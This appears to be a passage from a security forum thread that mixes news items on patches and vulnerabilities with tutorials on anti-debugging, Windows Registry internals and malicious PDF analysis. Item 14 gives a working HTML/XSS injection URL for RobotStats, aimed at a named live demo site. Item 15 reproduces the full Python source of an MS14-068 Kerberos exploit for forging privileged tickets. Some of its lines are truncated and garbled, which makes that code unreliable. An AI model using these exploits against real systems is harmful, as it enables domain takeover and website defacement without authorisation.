Russ Ernst of Lumension. The final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015. As the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said. Source
  11. There is an easily exploitable remote code execution vulnerability in a popular WordPress plugin that helps manage file downloads and researchers say the bug could be used by even a low-level attacker to run arbitrary code on a vulnerable site. The vulnerability is in the WP Download Manager, versions 2.7.4 and lower, and it could be used to implant a backdoor on a vulnerable site or get access to administrative accounts. Researchers at Sucuri discovered the vulnerability and a fixed version of the WP Download Manager plugin was released earlier this week. “The plugin used a custom method to handle certain types of Ajax requests which could be abused by an attacker to call arbitrary functions within the application’s context. There were no permission checks before handling these special Ajax calls. This allowed a malicious individual (with a minimal knowledge of WordPress internals) to inject a backdoor on the remote site or to change the administrator’s password if the name of his account was known. As this function is hooked to the ‘wp’ hook (which is executed every single time somebody visits a post/page), it could be abused by anyone,” Mickael Nadeau of Sucuri wrote in an analysis of the bug. WordPress is one of the more popular content management systems in use today and is used both by individuals for small Web sites and by businesses for much larger sites. Attackers often target WP sites that are running vulnerable versions of the software and WordPress sites have been hit by mass code-injection attacks in the past. The bug in WP Download Manager is caused by an Ajax function that didn’t enforce permission checks. “Any WordPress based website running the WP Download Manager version would be susceptible to remote code execution. Allowing an attacker to inject a backdoor and change important credentials, like admin accounts,” Nadeau said. Users running a vulnerable version should update to WP Download Manager 2.7.5. Source
  12. Apple has pulled a batch of security updates for Safari that it initially released yesterday. The updates were set to address several usability and security issues in the browser including some that could have led to code execution and data exfiltration. While notes for the patches are still published in the security section of Apple’s support site, the actual update has disappeared from Apple’s Software Update mechanism, suggesting that the fixes were not ready for the public. Whenever it’s made public, the update will affect three builds of Safari: 6.2.1, 7.1.1, and 8.0.1, on Lion, Mavericks, and Yosemite OSX, respectively. Ultimately three Webkit issues will be fixed with the update. The first fixes an issue with style sheets that are loaded cross-origin, something that could lead to data exfiltration if a CSS file was loaded by a Scalable Vector Graphics (SVG) in an img element. In the update the browser fine-tunes how external CSS files are blocked. Apple credits Rennie deGraaf of iSEC Partners for digging up this particular bug. The second fix remedies an issue discovered by Jordan Milne, a Canadian web security consultant, where any website that frames malicious content could have triggered UI spoofing. The last issue could have led to unexpected application termination or arbitrary code execution if a user visited a malicious website. This issue, due to several memory corruption issues, 11 CVEs total, was fixed by improved memory handling. Before it was pulled, the update was also said to have fixed an issue that prevented history from being synced across devices if iCloud was turned off, and prevented saved passwords from being auto-filled. The update is also said to enhance Safari’s WebGL graphics on Retina displays. While Apple has been known pull back updates from time to time, it’s unclear when exactly the patches will resurface in Software Update. In late September, shortly after it released the iPhone 6, the company pulled back an iOS update (8.0.1) that wound up disabling cellphone service and TouchID on a number of iPhones. Apple eventually pushed an update to the update the next day and later blamed the snag on software distribution issues. Email requests for comment to Apple were not immediately returned on Thursday. Source
  13. Attack and vulnerability details are often disclosed in order to prompt vendors and project maintainers into action. It happened recently with publication of attack code that mimicked the work of Karsten Nohl on BadUSB and tried to nudge Phison Electronics of Taiwan into looking at its USB firmware. It has happened before with Microsoft vulnerabilities where disclosures are made when there’s a perception the vendor is sitting on a vulnerability for too long. Over the summer, two researchers presented research at DEFCON on GPG collision attacks that resulted in their own call to action: Stay away from 32-bit key IDs in GPG. Using a tool they built called Scallion, Eric Swanson and Richard Klafter need just four seconds to generate colliding 32-bit key IDs on a GPU. “Key servers do little verification of uploaded keys and allow keys with colliding 32bit ids,” they wrote in a blogpost in July. “Further, GPG uses 32bit key ids throughout its interface and does not warn you when an operation might apply to multiple keys.” While this weakness has been known with GPG keys since at least 2011, a secondary call to action in this scenario is made to the handlers of GPG: Fix your UX, or user experience. “The core of GPG’s crypto is 100 percent rock solid,” Swanson said. “However, like a lot of tools, GPG has fairly atrocious UX. When attacking security, it’s almost always best to attack the user. These short key id collisions are a way to do that.” Swanson and Klafter concluded through their research that they can create a collision for every 32-bit key in the Web of Trust strong set, putting GPG’s longterm viability at risk. “GPG’s interface has needed an update for a long time. The goal of our project was to further demonstrate this need,” Klafter said. “I am positive there is enough passion for privacy and the GPG project itself that it will get the update it needs.” Simon Josefsson, a member of the GPG support team, said UX work is up to each application developer. “I’m sure that all applications that use short keyids should have some kind of thinking happening due to the evil32 issue, but whether it happens or not depends on the authors of the respectively project,” he said. GPG, short for Gnu Privacy Guard, is a free OpenPGP implementation, and it’s used to encrypt and sign data and communications. In their DEFCON presentation, Swanson and Klafter also disclosed some information on a vulnerability in GPG wherein the recv-key with full fingerprint feature does not verify the received key matches the fingerprint. GPG issued a patch Aug. 29 that mitigates potential man-in-the-middle attacks exploiting this situation. Swanson and Klafter hope the project continues on and addresses the collision issue. “There are a variety of ways to address this, but most strongly, GPG should switch to using at least 64-bit key IDs by default, and warn you whenever it detects a collision in displayed key ID (either 32-bit or 64-bit),” Swanson said. Swanson urges organizations using GPG to be careful with receiving keys, and to use gpg—fingerprint to verify key exchanges. The availability of tools such as Scallion allows for the rapid computation of key IDs, which even on older hardware, can try around 400 million keys per second, he said. “Despite its interface, GPG is still an excellent piece of software used everywhere from email encryption to software package verification,” Klafter said. “Its encryption is rock solid and I would still recommend GPG over other encryption tools, just make sure to check your full fingerprints.” Source
  14. # Title : RobotStats v1.0 HTML Injection Vulnerability # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com # Home : http://milw00rm.com / its online # Twitter : https://twitter.com/milw00rm or @milw00rm # Date : 22.11.2014 # Demo : http://alpesoiseaux.free.fr/robotstats/ # Download : http://www.robotstats.com/en/robotstats.zip # Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others # Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali ) Desc.: no security for admin folder (session control, login panel or anyone... maybe its different vulnerability) and no any filter for html code at robots.lib.php. you can inject your html code or xss code. html inj.: target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url= after you go here: target.com/robotstats/info-robot.php?robot=(robot id) or target.com/robotstats/admin/robots.php you will see your html page analysis: (/admin/robots.php) include "robots.lib.php"; //line 26 else if ($rub == "ajouter") { updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line) } analysis: (/admin/robots.lib.php) you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject. function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url) //line 163 (remember function line 65 in robots.php) { global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP; // dans tous les cas : echo "<p class='normal'><a class='erreur'> "; $msg = ""; // test du nom if ($nom == '') //line 172 control of blank or not blank { $msg = $RS_LANG["BadRobotName"]; } // test selon le mode de detection if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice { if ($user_agent == '') //line 180 control of blank or not blank { $msg = $RS_LANG["BadUserAgent"]; } } else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice { if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice { $msg = $RS_LANG["IPNotSpecified"]; } } else { $msg = $RS_LANG["BadDetectionMode"]; } if ($msg != "") { echo $msg; } else { $liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter $liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\""; if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot" { $liste_champs .= ", id"; $liste_valeurs .= ", '$robot'"; $sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)"; $res = mysql_query($sql) or erreurServeurMySQL($sql); echo $RS_LANG["RobotUpdated"]; } else { $sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)"; $res = mysql_query($sql) or erreurServeurMySQL($sql); echo $RS_LANG["RobotAdded"]; } } for demo: http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url= after you go here: http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id) or http://alpesoiseaux.free.fr/robotstats/admin/robots.php you will see your html page Source
  15. #!/usr/bin/python # MS14-068 Exploit # Author # ------ # Sylvain Monne # Contact : sylvain dot monne at solucom dot fr # http://twitter.com/bidord import sys, os from random import getrandbits from time import time, localtime, strftime from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5 from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \ decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \ AD_WIN2K_PAC from kek.pac import build_pac, pretty_print_pac from kek.util import epoch2gt, gt2epoch def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) sys.stderr.flush() nonce = getrandbits(31) current_time = time() as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(as_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) sys.stderr.flush() as_rep, as_rep_enc = decrypt_as_rep(data, user_key) session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) logon_time = gt2epoch(str(as_rep_enc['authtime'])) tgt_a = as_rep['ticket'] sys.stderr.write(' Done!\n') if krbtgt_a_key is not None: print >> sys.sdterr, as_rep.prettyPrint() print >> sys.stderr, as_rep_enc.prettyPrint() ticket_debug(tgt_a, krbtgt_a_key) sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) sys.stderr.flush() sock = send_req(tgs_req, kdc_a) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) tgt_b = tgs_rep['ticket'] sys.stderr.write(' Done!\n') if trust_ab_key is not None: pretty_print_pac(pac[1]) print >> sys.stderr, tgs_rep.prettyPrint() print >> sys.stderr, tgs_rep_enc.prettyPrint() ticket_debug(tgt_b, trust_ab_key) if target_service is not None and target_host is not None and kdc_b is not None: sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_ sys.stderr.flush() subkey = generate_subkey() nonce = getrandbits(31) current_time = time() tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, tgt_b, session_key2, subkey, nonce, current_time) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_ sys.stderr.flush() sock = send_req(tgs_req2, kdc_ sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_ sys.stderr.flush() data = recv_rep(sock) sys.stderr.write(' Done!\n') sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_ tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) sys.stderr.write(' Done!\n') else: tgs_rep2 = tgs_rep tgs_rep_enc2 = tgs_rep_enc sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) cc = CCache((user_realm, user_name)) tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) cc.add_credential(tgs_cred) cc.save(output_filename) sys.stderr.write(' Done!\n') if target_key is not None: print >> sys.stderr, tgs_rep2.prettyPrint() print >> sys.stderr, tgs_rep_enc2.prettyPrint() ticket_debug(tgs_rep2['ticket'], target_key) # Pretty print full ticket content # Only possible in a lab environment when you already know krbtgt and/or service keys def ticket_debug(ticket, key): try: ticket_enc = decrypt_ticket_enc_part(ticket, key) print >> sys.stderr, ticket.prettyPrint() for ad in iter_authorization_data(ticket_enc['authorization-data']): print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type'] if ad['ad-type'] == AD_WIN2K_PAC: pretty_print_pac(str(ad['ad-data'])) else: print >> sys.stderr, str(ad['ad-data']).encode('hex') except Exception as e: print 'ERROR:', e if __name__ == '__main__': from getopt import getopt from getpass import getpass def usage_and_exit(): print >> sys.stderr, 'USAGE:' print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0] print >> sys.stderr, '' print >> sys.stderr, 'OPTIONS:' print >> sys.stderr, ' -p <clearPassword>' print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-s', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest()) target_realm = user_realm target_service = target_host = kdc_b = None filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename) Source
      • 1
      • Upvote
  16. Malicious Software is able to detect if it's running within a debugging environment or a debugger has been attached to the process, and thus will not generate of it's malicious behaviors in order to avoid detection from the security analyst or whoever is attempting to debug the process. In this article, I'm going to describe some of the common anti-debugging techniques which are used to detect the presence of a debugger. *NtGlobalFlag: The NtGlobalFlag is located within the Process Environment Block (PEB) at offset 0x68 on x86 Windows, and at offset 0xBC on x64 Windows. The default value is always 0, and doesn't change when a debugger is attached to the process. There are several methods in which the NtGlobalFlag can be changed to detect the presence of a debugger. The NtGlobalFlag contains many flags which affect the running of a process. The most common flags which are set with NtGlobalFlag when a debugger creates a process, is the heap checking flags: FLG_HEAP_ENABLE_TAIL_CHECK (0x10) FLG_HEAP_ENABLE_FREE_CHECK (0x20) FLG_HEAP_VALIDATE_PARAMETERS (0x40) I've spoken about the purpose of these flags in a previous blog post which can be found here. These flags can be checked to detect the presence of a debugger. The general code from CodeProject, for checking the above flags: unsigned long NtGlobalFlags = 0; __asm { mov eax, fs:[30h] mov eax, [eax + 68h] mov NtGlobalFlags, eax } if(NtGlobalFlags & 0x70) // 0x70 = FLG_HEAP_ENABLE_TAIL_CHECK | // FLG_HEAP_ENABLE_FREE_CHECK | // FLG_HEAP_VALIDATE_PARAMETERS { // Debugger is present MessageBox(NULL, TEXT("Please close your debugging " + "application and restart the program"), TEXT("Debugger Found!"), 0); ExitProcess(0); } // Normal execution IsDebuggerPresent(): The IsDebuggerPresent() is a Kernel32 function which will return the Boolean value of True, if a debugger is attached to the process. It can be found by checking the IAT.* It can check the BeingDebugged field of the PEB: char IsDbgPresent = 0; __asm { mov eax, fs:[30h] mov al, [eax + 2h] mov IsDbgPresent, al } if(IsDbgPresent) { MessageBox(NULL, TEXT("Please close your debugging " + "application and restart the program"), TEXT("Debugger Found!"), 0); ExitProcess(0); } // Normal Execution The CheckRemoteDebuggerPresent() is a similar function, and can be detected with the same method. NtSetInformationThread() - Thread Hiding: The NtSetInformationThread() function has a hidden undocumented parameter called ThreadHideFromDebugger (0x11), which can be used to prevent any debugging events being sent to the debugger. Debugging Events are events which will notify the debugger, these can be the creation of new threads; generation of an exception; loading and unloading of DLLs and creating child processes. You can check if this function is imported in the IAT. PeStudio or a similar program like PeBear may check for this function. Execution Timing: This is a simple idea and is implies that the execution time when be slightly more with the presence of the debugger. This technique measures the execution time, and if slightly longer than usual, can imply the use of a debugger. The common instructions include: RDTSC, RDPMC and RDMSR instructions. GetTickCount(), GetLocalTime() and GetSystemTime() are all functions within the Kernel32 library. Again, you can check if these functions are imported within the IAT. Software Breakpoint Detection: The instruction 0xCC - INT 3 is used* to stop the execution of the debugged process and then pass the control to the debugger. The instruction is saved before the implementation of the breakpoint. Any comparison instructions (CMP, CMPXCHG) which use this instruction as a operand are considered as a anti-debugging technique. Source: link
  17. Exploring the Windows Registry Part 1 The Registry is a key component of the Windows operating system, and it's always been recommended that you should never careless run Registry Cleaners or start to change keys or delete keys which do not fully understand the purpose of. You never to seem to find much information about the Registry in general, unless it's in Specialist blogs or computer science papers. In this blog post I hope to show how to explore the Registry using WinDbg and look at some of the internal workings. The Registry tends to be referred less commonly as the Configuration Manager, and the Configuration Manager is the technical name for it. As the name suggests, the Configuration Manager mainly maintains the state of the configuration data for the operating system and any programs which may have been installed. The Registry is divided into several sections called Rootkeys. The Rootkeys are defined as follows: HKEY_LOCAL_MACHINE HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_PERFORMANCE_DATA HKEY_USERS Each Rootkey has a number of Hives which are subdivided into Keys and Values. This can be seen when viewing the Registry with the Registry Editor. Configuration Data), COMPONENTS, HARDWARE, SAM, SECURITY, SOFTWARE and SYSTEM. Any changes here will apply to the entire system. The HKEY_CURRENT_CONFIG contains information relating to Hardware Profiles, which enables configuration driver settings. A Hardware Profile may change from boot to boot, and will be used by any programs which require it. The HKEY_CLASSES_ROOT contains information for file extension associations, COM Class reregistration and UAC (User Account Control). The HKEY_CURRENT_USER contains the configuration data regarding the locally logged on user. The Root Key is mapped to the Ntuser.dat file which is present on the hard drive. Some of the local configuration data examples include: Environment Variables, Network Settings, Software Settings and Session Information. The HKEY_USERS contains data required each loaded user profile, and will be used by Winlogin to implement any specific user changes. This section will also contain keys relating to user security identifiers for that profile. The HKEY_PERFORMANCE_DATA contains operating system and server performance counters, and will not be visible through the Registry Editor. These performance counters are only available through the Windows Registry API. The HKEY is used to represent a handle to the rootkey. Now we have looked at the general logical structure of the Windows Registry, will need to examine it's actual implementation onto the hard disk. This is achieved through the concept of Hives, Cells and Bins. It is possible to be examine to parts of the Registry in Physical Memory. The structure of a Configuration Manager Hive can be seen with WinDbg using the _CMHIVE data structure. It's a large data structure, and therefore I have omitted some of the fields. The above data structure contains a larger sub structure called _HHIVE, which contains some very useful information. The _CMHIVE structure is allocated from paged pool, and has the pool tag of CM10. You can view this pool allocation information with !pooltag and !poolfin Using the !poolfind extension with the pooltag and specifying the pool type as paged pool with the 1 switch, we can see all the pool allocations for that specific pool tag A Hive is simply the on disk representation of the Registry, each one of these has it's own registry tree which serves as a root. The hives are then loads the Hives which can be found HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\hivelist. These Hives are stored on the hard disk, and are then linked to the Registry file paths as seen below. Most of the hives reside in the System32 folder, whereas, the others will reside in the UserProfiles and Users folder. Alternatively, we can view the Hivelist within WinDbg using the !reg hivelist extension. You may have noticed that the HARDWARE hive not does have a folder path, this is because it is updated every time the computer is booted, and therefore is only present within memory. We can even view the current paged pool consumption of the Registry Hives using the !reg dumppool extension. Again I've had to omit some information due to the size limitations. Using Process Explorer, and then selecting the System process, we can view the Hive Handles which are currently opened by the System Process. Going back to the general structure of how Hives are organized, Hives are linked together within a doubly linked list, the Head of this linked list can be found with WinDbg, the address is 8336e44c on x86, I'm sure if there is any difference on x64. We can also see this with the _CMHIVE structure and the HiveList field. The addresses within the linked list are all virtual addresses In the second part I have be taking a closer look at the structure of Hives and some more forensic analysis techniques. Source : BSODTutorials: Exploring the Windows Registry Part 1 Exploring the Windows Registry Part 2 Each Hive is divided into a number of allocation units called Blocks, the first block of a Hive is called the Base Block. The information which is stored within a Hive is then organized into Cells which contain active registry data such as keys, values, security descriptors and subkeys. The Hive Blocks are allocated in 4096 byte allocation sizes, and are called Hive Bins. The Base Block may also be referred to as the Registry Header, with the other blocks being called Hive Bins. Each Hive Bin is then divided further into Cells as explained above. A Hive Bin will have the hbin signature which can be found with WinDbg. Firstly, use the !reg hivelist extension, and then use the !reg viewlist extension with a desired Hive Address. The !reg viewlist extension will list the Mapped Views for the selected Hive. I wasn't able to find a dump file which had any mapped views, therefore I won't be able to show you the steps completely. Once you have used the !reg viewlist extension, then use the db command with a desired view to view the contents of a bin. The _HHIVE data structure seems to contain a Signature field and BaseBlock field as described earlier. Each Hive Bin contains a pointer to the next Hive Bin and the first Hive Bin. We can find free Hive Bins with the !reg freebins extension and the Hive address. These Hive Bins are only really containers for Cells which hold registry information such as keys, security descriptors, subkey lists and key values. There a few different types of Cells: Key Cell Value Cell Subkey-list Cell Value-list Cell Security-Descriptor Cell The Key Cell contains the registry key and may be called the Key Node. A Key Cell will contain the kn signature for Keys and kl for Link Nodes. Furthermore, the Key Cell will maintain timestamp information about the latest update to that key, and various Cell Indexes which will describe additional information. The Value Cell contains information about the key's value, and will have a Cell Index into what the cell which contains such data about the key. The signature will be kv. The Subkey-List Cell contains a list of Cell Indexes for Key Cells in which all share a common Parent Key. The Value-List Cell is the same as above, but applies to Value Cells rather than Key Cells. The Security Descriptor Cell will contain the ks signature and a reference count which maintains a count of the number of Key Nodes or Key Cells which share the Security Descriptor. This cell will contain a Security Descriptor. We can view Cell data structures with the _CM_CELL_DATA and then using the -r switch to dump all the hidden sub data structures. The -r switch is really useful for data structures in general, especially since Microsoft won't document some sub fields fully. Since we are the topic of keys, I thought it would be appropriate to look at the concept of Keys and how we can investigate into Keys further with WinDbg. We can firstly use the !reg openkeys extension, and then view any open keys. Please note that I've omitted the output of the extension to one Hive. However, we can gather more interesting information by looking into a few data structures. Each key will have a Key Control Block (KCB), we can use the _CM_KEY_CONTROL_BLOCK data structure to view the information about the open key. This is similar information to which can be found with the !reg kcb extension, you will need to use the !reg findkcb extension with the full registry path, in order to find the kcb address. However, with the open keys case, you can simply use the !reg kcb extension since the KCB address is already given. The Configuration Manager maintains open keys within a table for fast name lookups, the table can be found with two global variables called CmpCacheTable and CmpHashTableSize. The CmpCacheTable is a pointer to a hash table which explains the _CM_KEY_HASH data structure within the KCB. Each entry within the table is a pointer to the _CM_KEY_HASH data structure. The NextHash field points to the next structure within the table. Source: link Exploring the Windows Registery Part 3 Cells are containers for information, such as keys, thus the reason for the different type of cells explained in the last post. In order to make the logical structure of the registry clearer, it's important for me to state how all the different parts I've been discussing fit together to form one complete picture of the Windows Registry. Hives are split into Bins, and the Bins are then split into Cells. A Empty Bin will not contain any cells, whereas, a Bin with Cells will obviously contains Cells which will contain registry data. This brings around the point about Cell Indexes and Cell Mappings, and some of the data structures will can explore with WinDbg. Cell Indexes are essentially pointers which link cells from different hives together, to make easier and more efficient for the Configuration Manager to load information which it is searching for. More specifically, the Cell Index is a offset into the cell with the subtraction of the size of the base block for the selected hive. The tables which the Cell Indexes are used to index into, can be found within the Storage.Map member of the _DUAL data structure of the appropriate _HHIVE data structure. We can expand the _DUAL data structure and examine this member. The _HMAP_DIRECTORY is a array of pointers to table entries, which then contain the information for a specific Block and Bin. The FreeDisplay field is used to for free cells within memory. Since Hives are allocated from Paged Pool, they will need to be mapped since paged pool isn't guaranteed to be contiguous. This leads to the concept of Cell Index Mapping, which is very much the same as Virtual Address Translation on x86 systems; remember that x64 had a additional table of directory pointers. Using the diagram above, it may become more apparent what the pointers within the mentioned data structures are being used to index into. As we can see, the Directory Index pointer is being used to point to the Hive Cell Map Directory, which is then used to point to the Cell Map Table with a Table Index pointer, and then the Byte Offset is used to point to the specific Cell within the Hive Block. There is a additional bit which is either 0 or 1, and is used to determine if the Hive is Volatile or Stable, and which table type to begin searching with. This translation is used for Hives in memory. 1 is Volatile and 0 is Stable. Directory Index = 10 bits Table Index = 9 bits Byte Offset = 12 bits Since Hives usually reside on the hard disk, and are then mapped into memory, in order to avoid excessive consumption of the Cache Manager's address space. The number of mapped views for a hive is limited to 256 views. The LRU (Least Recently Used) views list is consulted when this has been reached, and when a new mapping is required because the Configuration Manager requires a hive to be mapped into memory. The LRU mapping will be removed from the list. This data structure is allocated with Paged Pool. There is some interesting WinDbg extensions we can use to find additional information related to Cell Indexes such as the !reg cellindex extension. The extension shows the virtual address associated with the Cell Index. The first address is the Hive Address and the 40 is the offset which we are looking for. I've used the SYSTEM hive in this example. Source: link
      • 1
      • Upvote
  18. Mass mailing or targeted campaigns that use common files to host or exploit code have been and are a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened trough a browser plug-in. In regards to malicious PDF files the security industry saw a significant increase of vulnerabilities after the second half of 2008 which might be related to Adobe Systems release of the specifications, format structure and functionality of PDF files. Most enterprise networks perimeters are protected and contain several security filters and mechanism that block threats. However a malicious PDF or MS Office document might be very successful passing trough Firewalls, Intrusion Prevention Systems, Anti-spam, Anti-virus and other security controls. By reaching the victim mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document. Then, for example, If the user opens a PDF malicious file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center Handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could be exploited without opening the file and just by having a malicious file on the hard drive as described by Didier Stevens. From a 100 feet view a PDF file is composed by a header , body, reference table and trailer. One key component is the body which might contains all kinds of content type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex which means the same information can be encoded and obfuscated in many ways. For example within objects there are streams that can be used to store data of any type of size. These streams are compressed and the PDF standard supports several algorithms including ASCIIHexDecode, ASCI85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, DCTCDecode called Filters. PDF files can contain multimedia content and support JavaScript and ActionScript trough Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All this features and capabilities are translated in a huge attack surface! From a security incident response perspective the knowledge about how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of files an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore it can help to be better prepared and identify future security incidents and how to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files. In case of malicious PDF files there are 5 steps. By using REMnux distro the steps are described by Lenny Zeltser as being: 1. Find and Extract Javascript 2. Deobfuscate Javascript 3. Extract the shellcode 4. Create a shellcode executable 5. Analyze shellcode and determine what is does. A summary of tools and techniques using REMnux to analyze malicious documents are described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and illustrate an introduction to the tools and techniques below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of Adobe Reader Javascript engine to exploit CVE-2013-2729. This vulnerability found by Felipe Manzano exploits an integer overflow in several versions of the Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on Virus Total was only detected by 6 of the 55 AV engines. Let’s go through each one of the mentioned steps to find information on the malicious PDF key characteristics and its capabilities. 1st Step – Find and extract JavaScript One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contain some of these keywords. In this case the first observations shows the PDF file contains 6 objects and 2 streams. No JavaScript mentioned but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms which might indicate it is malicious. Then looking deeper we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity but in this case the Object 2 is the /XFA element that is referencing to Object 1 which contains a stream compressed and rather suspicious. Following this indicator pdf-parser.py allows us to show the contents of an object and pass the stream trough one of the supporter filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) trough the –filter switch. The –raw switch allows to show the output in a easier way to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren’t on the original PDF file. If this document is opened by a victim the /XFA keyword will execute this malicious code. Another fast method to find if the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, execution of Javascript and shellcodes. When running the malicious PDF file against the last version of the 